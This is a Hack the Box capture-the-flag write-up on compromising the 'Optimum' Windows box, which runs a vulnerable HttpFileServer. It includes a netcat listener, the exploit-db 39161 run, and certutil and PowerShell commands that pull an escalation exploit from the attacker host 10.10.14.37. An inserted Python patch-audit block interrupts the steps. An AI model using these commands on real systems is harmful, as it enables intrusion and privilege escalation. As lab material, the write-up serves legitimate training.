Hack the Box — Optimum

Ethan Troy
Offensive Walking
Mar 7, 2023

With and Without Metasploit

Originally, I solved this box as part of the TCM Security Practical Ethical Hacking course with Metasploit, but Heath, the instructor, did mention that going back to solve it manually would be good practice. Welp, since the OSCP only allows one use of Metasploit, I figured I should get into the practice of doing boxes without it. This box is also on the TJ Null list.

Recon

nmap -sC -sV -O -oA nmap/initial 10.10.10.8
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.8
nmap -sU -O -p- -oA nmap/udp 10.10.10.8

Enum

Google it…

Exploitable! We find https://www.exploit-db.com/exploits/39161

Exploitation With Metasploit

Find exploit for HttpFileServer 2.3

Configure the Options

There’s a difference in architecture between the box and our meterpreter session

But that doesn’t seem to affect our exploitation

Possible because Metasploit is auto-detecting the target

Privilege Escalation

I background the first meterpreter session and search for suggested post-breach exploits.
The only option that needs to be configured here is the session.
If the session IDs aren’t known, you can just run show sessions.

Once the suggester runs, I find what I’m really looking for, which is a way to escalate privileges from the “Kostas” user to SYSTEM (the Windows equivalent of root).

We get SYSTEM from the exploit.

Manual Exploitation

In order to use the exploit we found through Google searching, we must find netcat and copy it into our working folder so we can serve it:

locate nc.exe
cp /usr/share/windows-binaries/nc.exe ~/HTB/Optimum-10.10.10.8

Start the HTTP server

python -m SimpleHTTPServer 80

Start a listener

nc -nlvp 5555

Download the exploit we found: https://www.exploit-db.com/exploits/39161

“searchsploit -m” makes it easy to download exploits from exploit-db

Edit the exploit with our details

Run the exploit

python 39161.py 10.10.10.8 80

Acquire shell on listening port

Get user flag

Priv Esc

I used https://github.com/Glyph-Research/Windows-Exploit-Suggester.git which, as its name implies, suggests exploits based on system info.

Initially, I ran this based on the readme instructions:

pip install xlrd --upgrade

to install and update the dependencies, BUT it actually broke the suggester script.

I kept getting this error:

The fix was to downgrade to the older version I had before:

pip install xlrd==1.2.0

Now that the dependency issue has been fixed let me go back and explain the preparation for the above command.

In order to prepare the system info, I run the ``systeminfo`` command from the Kostas user foothold.

Copy the output of ``systeminfo`` into sysinfo.txt

Then I run the following to create the database .xls file:

./windows-exploit-suggester.py --update

Once those two pieces are created I can run the suggester:
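To show what the systeminfo stage of that workflow actually does, here is an added example (my own code, not the Windows-Exploit-Suggester project's): it parses constructed ``systeminfo`` output for the OS version, architecture and installed hotfixes, then reports which hotfixes from a required list are missing, which is the patch-audit check a defender would run. The sample output and all KB identifiers are placeholders I made up.

```python
import re

# Constructed sample of `systeminfo` output; the KB ids are placeholders, not real hotfixes.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1000001
                           [02]: KB1000002
                           [03]: KB1000003
Network Card(s):           1 NIC(s) Installed.
"""

FIELDS = {"OS Name": "os_name", "OS Version": "os_version", "System Type": "arch"}


def parse_systeminfo(text):
    """Return os_name, os_version, arch and the set of installed KB ids from systeminfo text."""
    info = {"os_name": None, "os_version": None, "arch": None, "hotfixes": set()}
    for line in text.splitlines():
        m = re.match(r"^(OS Name|OS Version|System Type):\s*(.*)$", line)
        if m:
            info[FIELDS[m.group(1)]] = m.group(2).strip()
            continue
        # Hotfix entries are indented lines of the form "[01]: KB1234567"
        m = re.search(r"\[\d+\]:\s*(KB\d+)", line, re.IGNORECASE)
        if m:
            info["hotfixes"].add(m.group(1).upper())
    return info


def missing_hotfixes(info, required):
    """Return the required KB ids (compared case-insensitively) that are not installed, sorted."""
    installed = info["hotfixes"]
    return sorted({kb.upper() for kb in required if kb.upper() not in installed})


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(host["os_name"], "|", host["os_version"], "|", host["arch"])
    # KB1000009 is a made-up id that the sample host does not have installed
    print("missing:", missing_hotfixes(host, ["KB1000002", "KB1000009"]))
```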

From here all I have to do is download the precompiled executable. Since my Python server is still up and running, I put this .exe in the same folder so I can grab it from the Kostas shell.

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe

Go back to the Kostas shell and use certutil to fetch it:

certutil.exe -urlcache -f http://10.10.14.37:80/41020.exe toasted.exe

This can also be accomplished with PowerShell:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Once the exploit has run and privileges have been escalated, getting the root flag is simple.

Issues

Why was any of this possible? Both the foothold and the privilege escalation were due to old, unpatched software. This box is old but has evergreen relevance, because we are still facing issues in 2023 due to unpatched software and system components.
